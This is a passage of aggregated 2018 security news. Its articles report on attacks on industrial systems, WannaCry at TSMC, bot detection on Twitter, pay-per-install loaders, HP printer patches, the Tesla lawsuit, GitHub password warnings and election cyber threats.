The danger is that criminal hackers are more clumsy than elite state actors. Current geopolitical tensions encourage nation states to explore the critical infrastructure of adversaries looking for an advantage in case of an escalation into actual warfare; but for the moment, that type of preparatory cyberwarfare is stealthy reconnaissance. State actors do not wish to be discovered.

These criminals were clumsy and not concerned with being discovered. This type of activity, warns Cybereason, "dramatically increases the risk of a mistake having real-world consequences... Hackers seeking to make a name for themselves or simply prove that they can get into a system are far more likely to cause failures out of ignorance rather than malice. This makes incident response and attribution harder, but it also is more likely to result in an unintended real-world effect."

The long-term danger to the critical infrastructure may come from nation-sate attacks -- but the immediate danger is more likely to come from less competent cyber criminals. Cybereason recommends that companies with ICS environments should operate a unified SOC. "Companies may have a NOC monitoring the OT environment, but a combined SOC lets you see all operations as they move through the network. Having this visibility is important because attackers could start in the IT environment and move to the OT environment," said Barak.

Boston, MA-based threat-hunting Cybereason raised $100 million in Series D funding from SoftBank Corp in June 2017 -- bringing the total raised to $189 million. It was founded by Lior Div, Yonatan Amit, Yossi Naar in 2012. All three are veterans of Israel's elite IDF 8200 intelligence unit.

TSMC Chip Maker confirms its facilities were infected with WannaCry ransomware
7.8.2018 securityaffairs

TSMC shared further details on the attack and confirmed that its systems were infected with a variant of the infamous WannaCry ransomware.
Early in August, a malware has infected systems at several Taiwan Semiconductor Manufacturing Co. (TSMC) factories, the plants where Apple produces its devices.

TSMC is the world’s biggest contract manufacturer of chips for tech giants, including Apple and Qualcomm Inc.

Now the company shared further details on the attack and confirmed that its systems were infected with a variant of the infamous WannaCry ransomware that hit 200,000 computers across 150 countries in a matter of hours in May 2017.

WannaCry took advantage of a tool named “Eternal Blue”, originally created by the NSA, which exploited a vulnerability present inside the earlier versions of Microsoft Windows. This tool was soon stolen by a hacking group named “Shadow Brokers” which leaked it to the world in April 2017.

The infection caused one of the most severe disruptions suffered by TSMC as it ramps up chipmaking for Apple Inc.’s next iPhones.

The company contained the problem, but some of the affected plants shut down an entire day of production.

It has been estimated that the overall impact on the revenue of TSMC would be approx $256 million.

Chief Financial Officer Lora Ho confirmed that the infection would have some impact on TSMC’s 2018 profit, but declining to elaborate on further details.

TSMC Apple infection

According to the manufacturer, it wasn’t a targeted attack, instead, the systems were infected “when a supplier installed tainted software without a virus scan” to TSMC’s network.

The malware rapidly spread within the company network and infected more than 10,000 machines in some of the company’s production plants, including Tainan, Hsinchu, and Taichung.

“We are surprised and shocked,” TSMC Chief Executive Officer C. C. Wei said, “We have installed tens of thousands of tools before, and this is the first time this happened.”

WannaCry infected many other bit companies, the list of victims includes Boeing, Renault, and Honda,

TSMC confirmed that customers data were not compromised during the attack, it warned customers that shipment delays are expected.

Duo Security created open tools and techniques to identify large Twitter botnet

7.8.2018 securityaffairs BotNet

Researchers at security firm Duo Security have created a set of open source tools and disclosed techniques that could be used to identify large Twitter botnet.
Security experts from Duo Security have developed a collection of open source tools and disclosed techniques that can be useful in identifying large Twitter botnet.

The experts developed the tools starting from the analysis of 88 million Twitter accounts and over half-a-billion tweets, one of the largest random datasets of Twitter accounts analyzed to date.

“This paper details the techniques and tools we created to both build a large dataset containing millions of public Twitter profiles and content, as well as to analyze the dataset looking for automated accounts.” reads the research paper published by Duo Security.

“By applying a methodical data science approach to analyzing our dataset, we were able to build a classifier that effectively finds bots at a large scale.”

The dataset was composed by using the Twitter’s API, collected records include profile name, tweet and follower count, avatar, bio, the content of tweets, and social network connections.

Practical data science techniques can be used to create a classifier that could help researchers in finding automated Twitter accounts.

The experts defined 20 unique account heuristics to discover the bots, they include the number of digits in a screen name, Entropy of the screen name, followers/following ratio, number of tweets and likes relative to the account’s age, number of users mentioned in a tweet, number of tweets with the same content, percentage of tweets with URLs, time between tweets, average hours tweeted per day, and average “distance” of account age in retweets/replies.

The above heuristics are organized in the 3 categories, the “Account attributes,” “Content,” and “Content Metadata.”

The tools and the techniques devised by the researchers could be very useful in investigating fraudulent activities associated with Twitter botnet. The experts first identify the automated bots then they use the tool to monitor the evolution of the botnets they belong.

The experts shared a case study related to the discovery of a sophisticated botnet of at least 15,000 bots involved in a cryptocurrency scam. The analysis of the botnet and the monitoring of the malicious infrastructure over time allowed the expert to discover how bots evolve to evade detection.

The experts reported their findings to Twitter that confirmed it is aware of the problem and that is currently working on implementing new security measure to detect problematic accounts.

Twitter botnet

“Twitter is aware of this form of manipulation and is proactively implementing a number of detections to prevent these types of accounts from engaging with others in a deceptive manner. Spam and certain forms of automation are against Twitter’s rules. In many cases, spammy content is hidden on Twitter on the basis of automated detections.” replied Twitter.

“When spammy content is hidden on Twitter from areas like search and conversations, that may not affect its availability via the API. This means certain types of spam may be visible via Twitter’s API even if it is not visible on Twitter itself. Less than 5% of Twitter accounts are spam-related.”.

Duo Security will release its tools as open source on August 8 during the the Black Hat conference in Las Vegas.

“Malicious bot detection and prevention is a cat-and-mouse game,” concluded Duo Principal R&D Engineer Jordan Wright. “We anticipate that enlisting the help of the research community will enable discovery of new and improving techniques for tracking bots. However, this is a more complex problem than many realize, and as our paper shows, there is still work to be done.”

How do file partner programs work?
7.8.2018 Kaspersky Analysis

It’s easy to notice if you’ve fallen victim to an advertising partner program: the system has new apps that you didn’t install, ad pages spontaneously open in the browser, ads appear on sites where they never used to, and so on. If you notice these symptoms on your computer, and in the list of installed utilities there is, for example, setupsk, Browser Enhancer, Zaxar game browser, “PC optimizers” (such as Smart Application Controller or One System Care), or unknown browsers, 99% of the time it’s pay-per-install network. Every month, Kaspersky Lab security solutions prevent more than 500,000 attempts to install software that is distributed through advertising partner programs. Most such attempts (65%) happen in Russia.

Geography of attempts to install advertising partner programs apps, June 2018

The partner program acts as an intermediary between software vendors who wish to distribute their apps and owners of file hosting sites. When the user clicks the Download or similar button on such sites, the partner program provides a special installer that downloads the required file, but also determines which set of additional software should be installed on the PC.

File partner programs benefit everyone except the user. The site owner receives money for installing “partner” apps, and the partner program organizer collects a fee from the advertisers, who in turn get what they wanted, since their software is installed.

Propagation methods
To illustrate the process, we chose a scheme used by several partner programs. Let’s look at a real page offering to download a plugin for the S.T.A.L.K.E.R. game.

On attempting to download it, the user is redirected to a landing page selected by the administrator of the file-sharing site when loading the file onto the partner program server. Such pages often mimic the interface of popular cloud services:

Example of a fake page to which the user is redirected

This is what the landing page chooser looks like in the File-7 partner program settings

On clicking the download button, the user receives a file with one of the following formats:

Torrent file
ISO image
HTML document
Moreover, archives are often multi-layered and, in many cases, password-protected. Such protective measures and choice of format are not accidental — partner programs engage a wide range of tricks to prevent browser from blocking the download of their installers.

Notification about installer download blocks in a partner program’s news feed

The victim is often guided through the loader installation with hints on the download pages as to how to find the program, which password to use for the archive, and how to run the installer. Some versions contain readme attachments with a description of the actions required for the installation. Regardless of the type of file that the user wanted to download, the end product is an executable. Interestingly, every time one and the same file is downloaded, its hash sum changes, and the name always contains a set of some characters.

Example of how loader files are named

Communicating with the server
At the preparatory stage, the partner program installer exchanges data with the C&C server. Every message transmitted uses encryption, usually rather primitive: first it is encoded in Base64, then the result is inverted, and again encoded in Base64.

At stage one, the loader transmits information about the downloaded installer, plus data for identifying the victim to the server. The message includes confidential information: user name, PC domain name, MAC address, machine SID, hard drive serial number, lists of running processes and installed programs. Naturally, the data is collected and transmitted without the consent of the device owner.

The server responds with a message containing the following information fields:
adverts list — with the installation conditions for certain partner software
content — contains the name of the file that the user originally intended to download and a link to it
icon — contains a link to an icon that is later downloaded and used when starting the graphical interface of the loader.

The installer checks that the conditions listed for each “advert” are fulfilled. If all conditions are met, the id of the advert is added to the adverts_done list. In the example above, for instance, the registry is checked for paths indicating that one of the selected antiviruses is installed on the computer. If this is the case, the partner software with id 1116 is not added to the adverts_done list and will not subsequently be installed on the user’s computer. The purpose of such a check is to prevent the installation of a program that would trigger antivirus software. Next, the generated list is sent to the server:

The server selects several id’s (usually 3-5) from the resulting adverts_done list and returns them to the campaigns list. For each id, this list has a checkboxes field containing the text to be displayed in the installation consent window, the url field containing a link to the installer of the given advert, and the parameter field containing a key for installing the unwanted software in silent mode.

After that, a window opens that simulates the download process in Internet Explorer. The loader does not explicitly notify the user that additional programs will be installed on the computer along with the downloaded file. Their installation can be declined only by clicking a barely discernible slider in the bottom part of the window.

File loader window

During the file download process, software that the user does not deselect is installed inconspicuously. At the final stage of operation, the loader reports to the server about the successful installation of each individual product:

Installed software analysis
By analyzing the loader process, we managed to get some links to various programs that can be installed secretly. Although most of the software relates to different advertising families (that’s how Pbot finds its way onto user devices, for example), that is not the only thing distributed via file partner programs. In particular, around 5% of the files were legitimate browser installers. About 20% of the files are detected as malicious (Trojan, Trojan-Downloader, etc.).

Owners of file-sharing sites that cooperate with similar partner programs often do not even check what kind of content visitors get from the resource. As a result, anything at all can be installed on the user’s computer besides legitimate software. Therefore, in the absence of security solutions, such resources need to be used with extreme caution.

Kaspersky Lab products detect the loaders of file partner programs with the following verdicts:



Pentagon Restricts Use of Fitness Trackers, Other Devices
7.8.2018 securityweek  BigBrothers

WASHINGTON (AP) — Military troops and other defense personnel at sensitive bases or certain high-risk warzone areas won't be allowed to use fitness-tracker or cellphone applications that can reveal their location, according to a new Pentagon order.

The memo, obtained by The Associated Press, stops short of banning the fitness trackers or other electronic devices, which are often linked to cellphone applications or smart watches and can provide the users' GPS and exercise details to social media. It says the applications on personal or government-issued devices present a "significant risk" to military personnel, so those capabilities must be turned off in certain operational areas.

Under the new order, military leaders will be able to determine whether troops under their command can use the GPS function on their devices, based on the security threat in that area or on that base.

"These geolocation capabilities can expose personal information, locations, routines, and numbers of DOD personnel, and potentially create unintended security consequences and increased risk to the joint force and mission," the memo said.

Defense personnel who aren't in sensitive areas will be able to use the GPS applications if the commanders conclude they don't present a risk. For example, troops exercising at major military bases around the country, such at Fort Hood in Texas or Norfolk Naval Station in Virginia, would likely be able to use the location software on their phones or fitness devices. Troops on missions in more sensitive locations, such as Syria, Iraq, Afghanistan or parts of Africa, meanwhile, would be restricted from using the devices or be required to turn off any location function.

Army Col. Rob Manning, a Pentagon spokesman, said it's a move to ensure the enemy can't easily target U.S. forces.

"It goes back to making sure that we're not giving the enemy an unfair advantage and we're not showcasing the exact locations of our troops worldwide," Manning said.

Concerns about exercise trackers and other electronic devices came to a head in January in the wake of revelations that an interactive, online map was pinpointing troop locations, bases and other sensitive areas around the world.

The Global Heat Map, published by the GPS tracking company Strava, used satellite information to map the locations of subscribers to Strava's fitness service. At the time, the map showed activity from 2015 through September 2017. And while heavily populated areas were well lit, warzones such as Iraq and Syria show scattered pockets of activity that could denote military or government personnel using fitness trackers as they move around.

The Pentagon immediately launched a review, noting that the electronic signals could potentially disclose the location of troops who are in secret or classified locations or on small forward operating bases in hostile areas.

This is the second memo affecting the use of cellphones and other electronic devices that the department has released in recent months. In May, defense officials laid out new restrictions for the use of cellphones and other mobile wireless devices inside the Pentagon.

That memo called for stricter adherence to long-held practices that require phones be left in storage containers outside secure areas where sensitive matters are discussed. But it also stopped short of banning the devices, and instead made clear that cellphones can still be used in common areas and other offices in the Pentagon if classified information is not present.

The latest memo says the new restrictions include GPS functions on fitness trackers, phones, tablets, smartwatches and other applications.

The Pentagon also said it will provide additional cybersecurity training to include the risks posed by the trackers and other mobile devices.

Heather Pierce, a spokeswoman for Fitbit, said Monday: "Fitbit is committed to protecting consumer privacy and keeping data safe. Unlike a smartphone, location data is not collected by Fitbit unless a user gives us access to the data, and users can always remove our access."

Facebook Asks Big Banks to Share Customer Details
7.8.2018 securityweek 

Facebook has asked major US banks to share customer data to allow it to develop new services on the social network's Messenger texting platform, a banking source told AFP on Monday.

Facebook had discussions with Chase, JPMorgan, Citibank, and Wells Fargo several months ago, said the source, who asked to remain anonymous.

The Silicon Valley-based social network also contacted US Bancorp, according to the Wall Street Journal, which first reported the news.

Facebook, which has faced intense criticism for sharing user data with many app developers, was interested in information including bank card transactions, checking account balances, and where purchases were made, according to the source.

Facebook confirmed the effort in a statement to AFP, but said it was not asking for transaction data.

"Like many online companies with commerce businesses, we partner with banks and credit card companies to offer services like customer chat or account management," Facebook said.

The goal was to create new ways for Messenger to be woven into, and facilitate, interactions between banks and customers, according to the reports. The smartphone texting service boasts 1.3 billion users.

"The idea is that messaging with a bank can be better than waiting on hold over the phone -- and it's completely opt-in," the statement said.

Citigroup declined to comment regarding any possible discussions with Facebook about Messenger.

"While we regularly have conversations about potential partnerships, safeguarding the security and privacy of our customers' data and providing customer choice are paramount in everything we do," Citigroup told AFP by email.

JPMorgan Chase spokeswoman Patricia Wexler directed AFP to a statement given to the Wall Street Journal saying, "We don't share our customers' off-platform transaction data with these platforms and have had to say 'No' to some things as a result."

Wells Fargo decline to address the news.

Privacy worries

Messenger can be used by businesses to help people keep track of account information such as balances, receipts, or shipping dates, according to the social network.

"We're not using this information beyond enabling these types of experiences -- not for advertising or anything else," Facebook explained in its statement.

"A critical part of these partnerships is keeping people's information safe and secure."

But word Facebook is fishing for financial information comes amid concerns it has not vigilantly guarded private information.

Facebook acknowledged last month that it was facing multiple inquiries from US and British regulators about a scandal involving the now bankrupt British consultancy Cambridge Analytica.

In Facebook's worst ever public relations disaster, it admitted that up to 87 million users may have had their data hijacked by Cambridge Analytica, which was working for US President Donald Trump's 2016 election campaign.

Facebook CEO Mark Zuckerberg announced in May he was rolling out privacy controls demanded by European regulators to Facebook users worldwide because "everyone cares about privacy."

The social network is now looking at cooler growth following a years-long breakneck pace.

Shares in Facebook plummeted last week, wiping out some $100 billion, after the firm missed quarterly revenue forecasts and warned growth would be far weaker than previously estimated.

Shares in the social network have regained some ground, and rose 4.4 percent to close at $185.69 on Monday.

Group-IB experts record a massive surge of user data leaks form cryptocurrency exchanges
7.8.2018 securityaffairs Cryptocurrency

Group-IB researchers have investigated user data leaks from cryptocurrency exchanges and has analyzed the nature of these incidents.
Security experts from Group-IB, an international company specializing in preventing cyberattacks and developing information security solutions, has investigated user data leaks from cryptocurrency exchanges and has analyzed the nature of these incidents. Within a year, the number of data leaks soared by 369%.

The USA, Russia and China are TOP-3 countries in which registered users became the victims of cyberattacks.

In 2017, when cryptocurrencies were gaining momentum, their record-breaking capitalization and a spike in Bitcoin’s exchange rate led to dozens of attacks on cryptocurrency services. Based on data obtained from the Group-IB Threat Intelligence (cyber intelligence) system, experts from the international company Group-IB have analyzed the theft of 720 user accounts (logins and passwords) from the 19 largest cryptocurrency exchanges

January holidays for hackers: a 689% surge in the number of leaks

The report «2018 Cryptocurrency Exchanges. User Accounts Leaks Analysis»shows a steady increase in the number of compromised user accounts on cryptocurrency exchanges. In 2017, their number increased by 369% compared to 2016. The first month of 2018 set a record: due to growing interest in cryptocurrencies and the blockchain industry, in January the number of incidents jumped by 689% compared to the 2017 monthly average. The USA, Russia, and China are the countries where users are targeted most often. The study has shown that every third victim of the attack is located in the United States.

cryptocurrency exchanges affected

Toolkit and infrastructure used for attacks

Experts of Group-IB have identified 50 active botnets used for launching cyberattacks on cryptocurrency exchanges users. The infrastructure used by cybercriminals is mainly based in the USA (56.1%), the Netherlands (21.5%), Ukraine (4.3%) and Russia (3.2%).

cryptocurrency exchanges affected

The attackers use an increasingly wide range of malicious software and update their tools on a regular basis. The most frequently used malicious software includes Trojans such as AZORult and Pony Formgrabber, as well as the Qbot. At the same time, cybercriminals have modified tools previously used for attacks on banks and now successfully use them to hack cryptocurrency exchanges and gain access to users’ personal data.

What makes a successful attack possible?

This is one of the key issues covered in the Group-IB report. The answer is actually quite simple: disregard for information security and underestimating the capabilities of cybercriminals. The first and main cause is that both users and exchanges omit to use two-factor authentication. The second cause is disregard for basic security rules such as the use of complex and unique passwords.

Group-IB has analyzed 720 accounts and found that one out of five users chose a password shorter than 8 characters (see Figure).

cryptocurrency exchanges affected

Attack as a premonition

Experts of Group-IB draw a bleak conclusion: currently no cryptocurrency exchange, regardless of its size and track record, can guarantee absolute security to its users. At least 5 out of 19 exchanges in question fell victim to targeted cyberattacks widely covered by the media. These are Bitfinex, Bithumb, Bitstamp, HitBTC, Poloniex and, presumably, Huobi. There are various attack vectors: errors in the source code of the software, phishing attacks, unauthorized access to the user database, vulnerabilities related to storage and withdrawal of funds. However, all of them stem from the lack of attention to information security and protection of digital assets.

“Increased fraudulent activity and attention of hacker groups to cryptoindustry, additional functional of malicious software related to cryptocurrencies, as well as the significant amounts of already stolen funds, signals that the industry is not ready to defend itself and protect its users”, says Ruslan Yusufov, the Director of Special Projects at Group-IB. “In 2018 we will see even more incidents. This situation requires prompt and effective response of all stakeholders, including experts in different areas.”

Recommendations of Group-IB experts to users and exchanges

In order to protect one’s funds against crypto-fraud, Group-IB recommends users to be mindful of their passwords (which should contain at least 14 unique symbols), never use the same passwords for different exchanges and always enable the 2FA (two-factor authentication). Experts recommend avoiding the use of public Wi-Fi (at least when carrying out exchange transactions) and paying special attention to one’s “traces” on the social media. For instance, users should not demonstrate the fact that they possess any cryptocurrency.

Recommendations to cryptoexchanges are also of high importance. First of all, they are strongly advised to make two-factor authentication obligatory for all the users and their operations, conduct regular security audits of IT infrastructure and related services, and allocate resources to training and awareness-raising concerning personnel security, starting from top management (founders) and down to rank-and-file employees. To improve the cybersecurity of cryptocurrency exchanges, experts also recommend installing Anti-APT solutions, using Threat Intelligence and implementing anti-fraud solutions, as well as behavioral analysis systems. Specialists also suggest preparing cybersecurity incident response plans which will minimize potential damage.

HP releases firmware updates for two critical RCE flaws in Inkjet Printers
7.8.2018 securityaffairs

HP has released firmware updates that address two critical remote code execution vulnerabilities in some models of inkjet printers.
HP has released firmware updates to address two critical RCE flaws affecting some Inkjet printers. The two flaws, tracked as CVE-2018-5924 and CVE-2018-5925, could be exploited by attackers to trigger stack or static buffer overflow.

An attacker can exploit the vulnerabilities by sending a specially crafted file to the vulnerable inkjet printers.

“Two security vulnerabilities have been identified with certain HP Inkjet printers. A maliciously crafted file sent to an affected device can cause a stack or static buffer overflow, which could allow remote code execution.” reads the security advisory published by HP.

The flaws have been assigned a CVSS score of 9.8 and affected roughly 160 models, including PageWide, DesignJet, Officejet, Deskjet, Envy, and Photosmart.

To download the firmware updates, go to the HP Software and Drivers page for your product and find the appropriate firmware update from the list of available software.
Go to the Upgrading Printer Firmware page and follow the instructions provided to install the firmware.

HP inkjet printers hacking

Flaws in the firmware of printers are not a novelty, in NNovember2017, experts from FoxGlove Security firm found a potentially serious remote code execution vulnerability in some of HP’s enterprise printers.

Recently HP launched a private bug bounty program that offers up to $10,000 to white hat hackers that will discover serious issues in its printers.

Ex-Tesla Worker Accused of Hacking Seeks $1M in Counterclaim

6.8.2018 securityweek  Hacking

Tesla Breach

RENO, Nev. (AP) — A former Tesla Inc. employee at the electric car maker's battery plant in Nevada is seeking at least $1 million in defamation damages after it accused him of sabotage, hacking into computers and stealing confidential information leaked to the media.

Lawyers for Martin Tripp filed a counterclaim in federal court this week alleging any damages Tesla incurred were caused or contributed to by Tesla's "own negligence, acts or omissions."

Tripp alleges that between $150 million and $200 million worth of battery module parts for Tesla's Model 3 vehicle were incorrectly handled as scrap earlier this year. He said more than 700 dented and/or punctured battery modules were not discarded and instead were being shipped or were in the process of being shipped to customers.

A punctured battery could pose a fire risk.

Tesla officials did not respond to repeated requests for comment from The Associated Press on Thursday.

Tripp said he was recruited by Tesla, moved to Sparks, Nevada, from Wisconsin and started working at the battery factory in October 2017 as a lead process engineering technician. He was fired June 19.

Tesla filed the lawsuit against Tripp on June 20, three days after Musk warned employees of sabotage from within the company.

In the months prior, Tripp witnessed "several concerning business practices" inconsistent with Tesla's representations to investors and the general public, according to his counterclaim filed in U.S. District Court in Reno on Tuesday.

Tripp said he repeatedly questioned supervisors about the large quantities of waste and scrap vehicle parts he observed "lying haphazardly on the ground inside the Gigafactory." But his concerns were never addressed or resolved, Tripp said.

Tripp said he emailed CEO Elon Musk directly about his concerns on May 16 before Musk was scheduled to visit the factory east of Sparks that night. Later that day, Tripp said his manager asked him to forward the email he sent to Musk "so that I can avoid getting fired tonight," according to the lawsuit.

His counterclaim says a design engineer also told Tripp to clean up the production line area so Musk wouldn't see the mounds of scrap and waste lying on the ground, but Tripp declined to do so because he wanted Musk "to see how the Gigafactory was actually being operated." He said he was reassigned to a different position the following day.

Tesla's original lawsuit said Tripp admitted to Tesla investigators that he wrote software that transferred several gigabytes of data outside the company, including dozens of photographs and a video, according to the lawsuit filed Wednesday. Hacking software from Tripp also was running on three computer systems of other employees "so that the data would be exported even after he left the company and so that those individuals would be falsely implicated," the lawsuit alleged.

The lawsuit said Tripp made false claims about the information he stole, including claims that Tesla used punctured battery cells in the Model 3, and claims about the amount and value of scrap material generated by Tesla's manufacturing process. Some of the claims made it into media stories about the company, but media organizations are not identified in the lawsuit.

Tripp, a former aviation electronics technician in the U.S. Navy who worked two decades in the electronic and engineering industries, said in his counterclaim he "did not sabotage Tesla or its operations" and his actions "were necessary, reasonable and/or privileged."

He acknowledged in the counterclaim that he had made claims about the scrap and punctured battery cells being used in Model 3 vehicles. But he said he did not direct code changes to the Tesla Manufacturing Operating System under false user names or export large amounts of highly sensitive Tesla data as Musk had asserted.

After he was reassigned to a new position, Tripp "learned of and witnessed additional unnerving, dangerous and wasteful business practices," including employees systematically reusing parts and battery cells that had been previously discarded as waste, the suit said.

The scrap problem dramatically increased in March 2018 when Tesla initiated a company-wide effort to reach its publicized goal of producing 2,500 Model 3 vehicles per week, the lawsuit said. It said the production push — with an objective of making 5,000 vehicles per week by July 2018 — was known as the "March to 2,500."

GitHub to Warn Users on Compromised Passwords
6.8.2018 securityweek  Incindent

In a move to protect its users, software repository site GitHub is now alerting account holders whenever it detects that a password has been compromised in breaches on other services.

Security experts have long pushed for the use of long, unique passwords, to ensure stronger security of all online accounts. However, even unique passwords can pose a great risk when compromised, especially if attackers can link them to specific accounts.

The new feature is the result of a partnership with Troy Hunt, the security researcher behind the popular HaveIBeenPwned.com project. The service allows users to check whether their accounts and passwords have appeared in any data breaches.

An internal tool GitHub has created is now taking advantage of a 517 million record dataset that Hunt made available for download through its service to “validate whether a user’s password has been found in any publicly available sets of breach data.”

The open-source software repository platform enabled the feature last week. The functionality, it says, it meant to alert all people who are using compromised passwords and prompt them to select a different one during login, registration, or when updating their password.

“Don’t worry, your password is protected by the password hashing function bcrypt in our database. We only verify whether your password has been compromised when you provide it to us,” GitHub explains.

Users who have two-factor authentication (2FA) enabled will receive periodic warnings to review the 2FA setup and recovery options, GitHub also reveals.

However, traditional 2FA options such as SMS have proven to be unreliable, and all of the online platform’s users are advised to use a 2FA authenticator application that supports cloud backups, to ensure a recovery option is always available for them.

“These new account security enhancements will help improve the security of your account. We hope you will take this opportunity to review the security of your account. Balancing security, usability, and recoverability is a personal decision,” GitHub notes.

The service’s users are advised to generate strong, unique passwords using a dedicated manager, to enable 2FA, and to make sure an account-recovery method is available. They should also update their primary email address if necessary and review their other credentials on the platform, GitHub says.

GitHub, which will soon become part of Microsoft, has made other security improvements as well, including the enforcing of SSL/TLS. This, however, did not stop hackers from compromising accounts to spread malicious code, as was the case with the recent Gentoo incident.

HP Patches Critical RCE Flaws in Inkjet Printers
6.8.2018 securityweek 

HP has released firmware updates for many of its ink printers to address a couple of critical vulnerabilities that can be exploited for remote code execution.

According to the HP Product Security Response Team (PSRT), the company’s Inkjet printers are affected by flaws that allow an attacker to trigger a stack or static buffer overflow and execute arbitrary code by sending a specially crafted file to an affected device.

The vulnerabilities are tracked as CVE-2018-5924 and CVE-2018-5925, and they have both been assigned a CVSS score of 9.8.

HP has shared a list of roughly 160 impacted products, including PageWide, DesignJet, Officejet, Deskjet, Envy and Photosmart devices. The firmware updates for each impacted product can be obtained from HP’s website.

This is not the first time a remote code execution flaw has been found in HP printers. Last year, researchers discovered several potentially serious vulnerabilities in some of HP’s enterprise printers, including an RCE bug affecting LaserJet Enterprise, PageWide Enterprise, LaserJet Managed and OfficeJet Enterprise printers.

HP recently announced the launch of a private bug bounty program that offers up to $10,000 for serious vulnerabilities found in the company’s printers. HP had invited 34 researchers by the time the initiative was unveiled.

The program covers HP LaserJet Enterprise printers and MFPs (A3 and A4), as well as the HP PageWide Enterprise printers and MFPs (A3 and A4).

Campaigns on Their Own as Cyber Threats Roil Midterms
6.8.2018 securityweek  Cyber

NEW YORK (AP) — Kamala Harris has been the target of social media misinformation campaigns since she became a U.S. senator.

Every month for the last 18 months, her office has discovered on average between three and five fake Facebook profiles pretending to be hers, according to a Harris aide. It's unclear who creates the pages, which are often designed to mislead American voters about the ambitious Democratic senator's policies and positions.

The aide spoke on the condition of anonymity, like more than a half dozen campaign officials contacted for this story, for fear of attracting unwanted attention from adversaries or scrutiny on the Senate office's evolving cybersecurity protocols.

Such internet mischief has become commonplace in U.S. politics. Facebook announced earlier this week that it uncovered "sophisticated" efforts, possibly linked to Russia, to influence U.S. politics on its platforms. Senior intelligence officials declared Thursday that foreign adversaries continue waging a quiet war against U.S. campaigns and election systems.

Still, one thing has become clear: With the midterm elections just three months away, campaigns are largely on their own in the increasingly challenging task of protecting sensitive information and countering false or misleading content on social media.

The Democratic National Committee has worked to strengthen its own internal security protocols and encouraged state parties to do the same, according to Raffi Krikorian, who previously worked for Uber and Twitter and now serves as the DNC's chief technology officer.

But in an interview, he acknowledged there are limits to how much the national party can protect the thousands of Democratic campaigns across the country.

"We're providing as much assistance to campaigns as we can, but there's only so much we can do," Krikorian said.

"For all the high-level campaigns I'm worried, but at least there are people to talk to," he continued. "The mid-sized campaigns are at least getting technical volunteers, but the truly down-ballot campaigns, that's where the state parties and coordinated campaigns can help, but there's no doubt that this is an uphill battle when we're dealing with a foreign adversary."

Officials in both political parties have intensified cybersecurity efforts, although the known cases of interference have so far overwhelmingly focused on Democrats.

The DNC now has a staff of 40 on its technical team, led by Krikorian and other Silicon Valley veterans hired in the months after Russians hacked the party's email system and released a trove of damaging messages in the months before President Donald Trump's 2016 victory.

Top U.S. intelligence and homeland security officials raised new alarms Thursday about outside efforts to influence the 2018 and 2020 elections during a White House press briefing.

Homeland Security chief Kirstjen Nielsen said: "Our democracy is in the crosshairs," while Director of National Intelligence Dan Coats added: "We continue to see a pervasive messaging campaign by Russia to try to weaken and divide the United States."

Facebook said it removed 32 accounts from its site and Instagram because they were involved in "coordinated" political behavior and appeared to be fake. Nearly 300,000 people followed at least one of the accounts, which featured names such as "Black Elevation" and "Resisters" and were designed to manipulate Americans with particular ethnic, cultural or political identities.

In many cases, House and Senate political campaigns said they're just beginning to adopt basic internal security protocols, such as two-step verification for all email, storage and social media accounts and encrypted messaging services such as Wickr.

There is no protocol in place for campaigns or national parties to monitor broader social media misinformation campaigns, however. Nor is there any sign that law enforcement is playing a proactive role to protect campaigns from meddling on a day-to-day basis.

The FBI has set up a Foreign Influence Task Force and intelligence agencies are collecting information on Russian aggression, but campaigns report no regular contact with law enforcement officials.

"At the end of the day, the U.S. government is not putting any type of a bubble around any (campaign). They do not have the authority, capacity or capability to do it," said Shawn Henry, a former senior FBI official who now leads the cybersecurity firm CrowdStrike, which works with political campaigns. "NSA is not sitting in the ISPs filtering out malicious traffic."

Henry added: "They've got to take pro-active actions themselves."

Earlier this month, Microsoft said it discovered a fake domain had been set up as the landing page for phishing attacks by a hacking group believed to have links to Russian intelligence. A Microsoft spokesman said this week that additional analysis confirmed the attempted attacks occurred in late 2017 and targeted multiple accounts associated with the offices of two legislators running for re-election. Microsoft did not name the lawmakers.

Sen. Claire McCaskill, D-Mo., said Russian hackers tried unsuccessfully to infiltrate her Senate computer network in 2017. Former Democratic U.S. Rep. Brad Ashford of Nebraska also recently confirmed that his 2016 campaign emails had been hacked by Russian agents.

Ashford, who narrowly lost his seat to Republican Don Bacon that year, said hackers obtained all of his campaign email correspondence with the Democratic Congressional Campaign Committee. He said he was notified of the breach in late July or early August 2016 by House Democratic Leader Nancy Pelosi's office.

Ashford has said he doesn't believe any of the stolen information ever went to Bacon or the Republican Party, and he doesn't know whether it made a difference in his race. He did face a series of anonymous political attacks on social media.

By their very nature, U.S. political campaigns can be a challenge to defend from a cybersecurity standpoint. They are essentially pop-up organizations that rely heavily on volunteers and are focused on a singular task — winning. In addition, high-level IT expertise costs money and campaigns typically run on tight budgets.

Some 2018 House campaigns have yet to hire basic communications staffers.

In the case of California Sen. Harris, who is considered a 2020 presidential prospect, her office plans to continue rooting out fake social media profiles on its own. They have had no contact with the FBI. They have reported the issue to Facebook in every case — not the other way around.

"It's on the forefront of everybody's mind," said Patrick McHugh, a former Senate campaign official who now leads the Democratic-aligned super PAC Priorities USA.

He acknowledged the tremendous challenge for many campaigns.

"All it takes is one person on a campaign to make a mistake," McHugh said. "You're up against a foreign country. That's a pretty big adversary that can and will go to all ends to get in."

New Open Source Tools Help Find Large Twitter Botnets
6.8.2018 securityweek  BotNet

Duo Security has created open source tools and disclosed techniques that can be useful in identifying automated Twitter accounts, which are often used for malicious purposes.

The trusted access solutions provider, which Cisco recently agreed to acquire for $2.35 billion, has collected and studied 88 million Twitter accounts and over half-a-billion tweets. Based on this data, which the company says is one of the largest random datasets of Twitter accounts analyzed to date, researchers were able to create algorithms for differentiating humans from bots.

The dataset, collected using Twitter’s API, includes profile name, tweet and follower count, avatar, bio, content of tweets, and social network connections.

Researchers created their tools and techniques for identifying bots based on 20 unique account characteristics, including the number of digits in a screen name, followers/following ratio, number of tweets and likes relative to the account’s age, number of users mentioned in a tweet, number of tweets with the same content, percentage of tweets with URLs, time between tweets, and average hours tweeted per day.

Tests conducted by experts led to the discovery of a sophisticated cryptocurrency-related scam botnet powered by at least 15,000 bots. These accounts were designed to use deceptive behaviors to avoid automatic detection, while attempting to obtain money from users by spoofing cryptocurrency exchanges, celebrities and news organizations.

Duo Security informed Twitter of its findings. The social media giant says it’s aware of the problem and claims it’s proactively implementing mechanisms to detect problematic accounts.

